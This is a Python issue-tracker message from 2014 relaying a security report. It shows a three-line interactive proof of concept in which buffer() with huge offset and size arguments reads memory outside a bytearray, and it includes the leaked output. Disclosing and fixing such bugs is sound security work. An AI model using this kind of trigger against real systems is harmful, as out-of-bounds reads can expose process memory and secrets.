This issue tracker has been migrated to GitHub, and is currently read-only.
For more information, see the GitHub FAQs in the Python's Developer Guide.

Author benjamin.peterson
Recipients benjamin.peterson
Date 2014-06-24.03:11:22
SpamBayes Score -1.0
Marked as misclassified Yes
Message-id <1403579483.71.0.894080875478.issue21831@psf.upfronthosting.co.za>
In-reply-to
Content
Reported by Chris Foster on the security list:

$ ./python 
Python 2.7.7+ (2.7:8e0b7393e921, Jun 24 2014, 03:01:40) 
[GCC 4.4.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> a = bytearray('hola mundo')
>>> b = buffer(a, 0x7fffffff, 0x7fffffff)
>>> print repr(b[:0x100])
"\x00\x08\x11\x00\x00\x00\x00\x00\x00\x00\xa00_\xf7\x10\x00\x00\x00i\x03\x00\x00\x02\x00\x00\x00\xa0\xd1\x18\x08I\x03\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00Directory tree walk with callback function.\n\n    For each directory in the directory tree rooted at top (including top\n    itself, but excluding '.' and '..'), call func(arg, dirname, fnames).\n    dirname is the na"
History
Date User Action Args
2014-06-24 03:11:23benjamin.petersonsetrecipients: + benjamin.peterson
2014-06-24 03:11:23benjamin.petersonsetmessageid: <1403579483.71.0.894080875478.issue21831@psf.upfronthosting.co.za>
2014-06-24 03:11:23benjamin.petersonlinkissue21831 messages
2014-06-24 03:11:22benjamin.petersoncreate